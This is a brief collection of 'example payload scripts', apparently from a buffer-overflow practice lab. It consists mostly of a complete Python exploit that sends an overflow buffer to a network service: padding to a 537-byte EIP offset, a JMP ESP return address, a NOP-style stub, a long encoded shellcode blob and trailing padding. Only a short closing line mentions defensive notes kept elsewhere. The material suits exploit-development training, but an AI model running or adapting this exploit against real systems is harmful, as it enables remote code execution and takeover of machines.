Example payload scripts

Badchars: \x00\xa0\xad\xbe\xde\xef

Exploit code

#!/usr/bin/env python3
import socket


ip = "MACHINE_IP"
port = 1337

buf_length = 1000
prefix = "OVERFLOW10 "
offset = 537                            # EIP offset
overflow = "A" * offset
jmp_esp = "\x05\x12\x50\x62"

buffer = ""
buffer += prefix
buffer += overflow                      # Padding
buffer += jmp_esp                       # Overwrite saved return pointer
buffer += "\x83\xec\x10"                # NOP sled
buffer += ("\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
	"\x11\xab\x0e\x07\x83\xee\xfc\xe2\xf4\xed\x43\x8c\x07\x11\xab"
	"\x6e\x8e\xf4\x9a\xce\x63\x9a\xfb\x3e\x8c\x43\xa7\x85\x55\x05"
	"\x20\x7c\x2f\x1e\x1c\x44\x21\x20\x54\xa2\x3b\x70\xd7\x0c\x2b"
	"\x31\x6a\xc1\x0a\x10\x6c\xec\xf5\x43\xfc\x85\x55\x01\x20\x44"
	"\x3b\x9a\xe7\x1f\x7f\xf2\xe3\x0f\xd6\x40\x20\x57\x27\x10\x78"
	"\x85\x4e\x09\x48\x34\x4e\x9a\x9f\x85\x06\xc7\x9a\xf1\xab\xd0"
	"\x64\x03\x06\xd6\x93\xee\x72\xe7\xa8\x73\xff\x2a\xd6\x2a\x72"
	"\xf5\xf3\x85\x5f\x35\xaa\xdd\x61\x9a\xa7\x45\x8c\x49\xb7\x0f"
	"\xd4\x9a\xaf\x85\x06\xc1\x22\x4a\x23\x35\xf0\x55\x66\x48\xf1"
	"\x5f\xf8\xf1\xf4\x51\x5d\x9a\xb9\xe5\x8a\x4c\xc3\x3d\x35\x11"
	"\xab\x66\x70\x62\x99\x51\x53\x79\xe7\x79\x21\x16\x54\xdb\xbf"
	"\x81\xaa\x0e\x07\x38\x6f\x5a\x57\x79\x82\x8e\x6c\x11\x54\xdb"
	"\x57\x41\xfb\x5e\x47\x41\xeb\x5e\x6f\xfb\xa4\xd1\xe7\xee\x7e"
	"\x99\x6d\x14\xc3\xce\xaf\x61\x2b\x66\x05\x11\xaa\xb5\x8e\xf7"
	"\xc1\x1e\x51\x46\xc3\x97\xa2\x65\xca\xf1\xd2\x94\x6b\x7a\x0b"
	"\xee\xe5\x06\x72\xfd\xc3\xfe\xb2\xb3\xfd\xf1\xd2\x79\xc8\x63"
	"\x63\x11\x22\xed\x50\x46\xfc\x3f\xf1\x7b\xb9\x57\x51\xf3\x56"
	"\x68\xc0\x55\x8f\x32\x06\x10\x26\x4a\x23\x01\x6d\x0e\x43\x45"
	"\xfb\x58\x51\x47\xed\x58\x49\x47\xfd\x5d\x51\x79\xd2\xc2\x38"
	"\x97\x54\xdb\x8e\xf1\xe5\x58\x41\xee\x9b\x66\x0f\x96\xb6\x6e"
	"\xf8\xc4\x10\xee\x1a\x3b\xa1\x66\xa1\x84\x16\x93\xf8\xc4\x97"
	"\x08\x7b\x1b\x2b\xf5\xe7\x64\xae\xb5\x40\x02\xd9\x61\x6d\x11"
	"\xf8\xf1\xd2")
buffer += "D" * (buf_length - (len(buffer) - len(prefix)))      # Trail padding
buffer += "\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("[+] Sending evil buffer of {} bytes...".format((len(buffer) - len(prefix) - 2)))
    s.send(bytes(buffer, "latin-1"))
    print("[+] Done!")
except socket.error:
    print("[-] Could not connect.")
finally:
    s.close()

Counter moves

These payload scripts assemble the overflow exploitation steps. The platform mitigations are what they are written to overcome. The defensive counterpart is in the blue notes on memory corruption and its limits.